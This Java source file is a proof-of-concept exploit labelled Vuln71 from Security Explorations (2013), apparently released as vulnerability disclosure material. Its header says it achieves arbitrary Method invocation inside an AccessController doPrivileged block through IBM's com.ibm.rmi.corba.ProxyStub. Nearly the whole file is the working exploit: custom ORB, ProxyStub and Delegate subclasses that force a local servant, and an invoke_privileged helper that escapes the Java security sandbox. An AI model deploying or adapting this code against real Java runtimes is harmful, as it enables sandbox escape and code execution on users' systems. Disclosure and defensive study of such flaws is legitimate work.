/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* com.ibm.rmi.corba.ProxyStub                                                */
/* arbitrary Method's invocation inside AccessController's doPrivileged block */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.net.*;
import java.util.*;
import org.omg.CORBA.Request;
import org.omg.CORBA.Context;
import org.omg.CORBA.ExceptionList;
import org.omg.CORBA.ContextList;
import org.omg.CORBA.NVList;
import org.omg.CORBA.NamedValue;
import org.omg.CORBA.portable.Delegate;
import com.ibm.rmi.corba.*;
import com.ibm.CORBA.iiop.*;

public class Vuln71 {

 public static class MyORB extends com.ibm.CORBA.iiop.ORB {
  public MyORB() {
   super();
  }

  public boolean noLocalCopies() {
   return true;
  }
 }

 public static class MyProxyStub extends ProxyStub {
  Object target;

  public MyProxyStub(Object target,Class c,Delegate d) {
   super(c,d);
   this.target=target;
  }

  public boolean _is_local() {
   return true;
  }

  public com.ibm.CORBA.iiop.ORB _orb() {
   return new MyORB();
  }

  public ServantObject _servant_preinvoke(String s,Class c) {
   ServantObject so=new ServantObject(null);
   so.servant=target;
   return so;
  }
 }

 public static class MyDelegate extends Delegate {
  public IOR locatedIOR() {
   return null;
  }

  public org.omg.CORBA.Object get_interface_def(org.omg.CORBA.Object obj) {
   return null;
  }

  public org.omg.CORBA.Object duplicate(org.omg.CORBA.Object obj) {
     return null;
    }

    public void release(org.omg.CORBA.Object obj) {
    }

    public boolean is_a(org.omg.CORBA.Object obj, String s) {
     return false;
    }

    public boolean non_existent(org.omg.CORBA.Object obj) {
     return false;
    }

    public boolean is_equivalent(org.omg.CORBA.Object obj, org.omg.CORBA.Object 
obj1) {
     return false;
    }

    public int hash(org.omg.CORBA.Object obj, int i) {
     return 0;
    }

    public org.omg.CORBA.Request request(org.omg.CORBA.Object obj, String s) {
     return null;
    }

    public org.omg.CORBA.Request create_request(org.omg.CORBA.Object obj, Context context, String s, NVList nvlist, NamedValue namedvalue) {
 return null;
    }

    public org.omg.CORBA.Request create_request(org.omg.CORBA.Object obj, Context context, String s, NVList nvlist, NamedValue namedvalue, ExceptionList exceptionlist, ContextList contextlist) {
     return null;
    }

 }

 public static Object invoke_privileged(Object obj,Method m,Object args[]) {
  Object res=null;

  try {
   MyDelegate dlg=new MyDelegate(); 
   MyProxyStub mps=new MyProxyStub(obj,m.getDeclaringClass(),dlg);

   res=mps.invoke(obj,m,args);
  } catch(Throwable t) {
   t.printStackTrace();
  }

  return res;
 }
}
